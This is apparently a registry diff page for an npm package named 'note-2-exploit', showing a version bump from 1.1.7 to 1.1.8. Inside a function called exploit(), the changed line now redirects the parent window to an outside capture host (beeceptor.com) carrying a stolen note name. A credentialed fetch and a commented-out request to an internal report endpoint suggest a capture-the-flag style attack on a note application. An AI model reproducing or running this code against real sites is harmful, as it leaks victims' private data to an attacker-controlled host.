note-2-exploit 1.1.7 → 1.1.8

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -42,7 +42,7 @@ async function exploit() {
42
42
  "redirect": "follow",
43
43
  "credentials": "include"
44
44
  });
45
- window.parent.location.replace("https://newname.free.beeceptor.com?q=success");
45
+ window.parent.location.replace("https://newname.free.beeceptor.com?q=" + note_name);
46
46
  // fetch("http://10.113.184.121:10082/report", {
47
47
  // "headers": {
48
48
  // "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "note-2-exploit",
3
- "version": "1.1.7",
3
+ "version": "1.1.8",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {